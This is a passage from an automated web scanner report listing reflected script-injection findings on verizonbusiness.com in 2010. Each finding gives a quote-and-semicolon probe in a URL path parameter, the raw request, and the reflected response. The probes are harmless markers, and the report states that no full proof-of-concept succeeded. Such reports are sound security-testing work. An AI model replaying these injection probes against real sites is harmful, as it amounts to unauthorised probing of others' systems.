Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutdc45b';999e20b66d4/news/social/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.460. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e57e"%3bbad14447f2f was submitted in the REST URL parameter 1. This input was echoed as 4e57e";bad14447f2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about4e57e"%3bbad14447f2f/news/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about4e57e";bad14447f2f/news/social/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.461. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9b21'%3b082cea29f1a was submitted in the REST URL parameter 2. This input was echoed as a9b21';082cea29f1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsa9b21'%3b082cea29f1a/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsa9b21';082cea29f1a/social/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.462. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96912"%3b89df30daca4 was submitted in the REST URL parameter 2. This input was echoed as 96912";89df30daca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news96912"%3b89df30daca4/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news96912";89df30daca4/social/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.463. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef700'%3b12f2670c9e was submitted in the REST URL parameter 3. This input was echoed as ef700';12f2670c9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/socialef700'%3b12f2670c9e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:18 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49741
Date: Wed, 17 Nov 2010 00:53:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/socialef700';12f2670c9e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.464. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 424ff"%3b1b3201e3aaa was submitted in the REST URL parameter 3. This input was echoed as 424ff";1b3201e3aaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/social424ff"%3b1b3201e3aaa/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/social424ff";1b3201e3aaa/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.465. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f461f'%3bf909a722933 was submitted in the REST URL parameter 1. This input was echoed as f461f';f909a722933 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutf461f'%3bf909a722933/socialmedia/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:07 GMT
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:53:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutf461f';f909a722933/socialmedia/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.466. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb861"%3b210de19a23 was submitted in the REST URL parameter 1. This input was echoed as bb861";210de19a23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbb861"%3b210de19a23/socialmedia/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutbb861";210de19a23/socialmedia/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.467. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77ab4'%3b111527fb9a4 was submitted in the REST URL parameter 2. This input was echoed as 77ab4';111527fb9a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/socialmedia77ab4'%3b111527fb9a4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:45 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/socialmedia77ab4';111527fb9a4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.468. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab61"%3b636568d8090 was submitted in the REST URL parameter 2. This input was echoed as 3ab61";636568d8090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/socialmedia3ab61"%3b636568d8090/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:22 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/socialmedia3ab61";636568d8090/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.469. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfab'%3bfa34b7a49bb was submitted in the REST URL parameter 1. This input was echoed as 4cfab';fa34b7a49bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar4cfab'%3bfa34b7a49bb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:59 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/ar4cfab';fa34b7a49bb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.470. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f988"%3bde4e7751f0d was submitted in the REST URL parameter 1. This input was echoed as 8f988";de4e7751f0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar8f988"%3bde4e7751f0d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:49 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta página no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ar8f988";de4e7751f0d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.471. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a33a"%3b4aae26e279b was submitted in the REST URL parameter 1. This input was echoed as 4a33a";4aae26e279b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /at4a33a"%3b4aae26e279b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46790
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/at4a33a";4aae26e279b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.472. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab853'%3b7f22bd307df was submitted in the REST URL parameter 1. This input was echoed as ab853';7f22bd307df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /atab853'%3b7f22bd307df/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
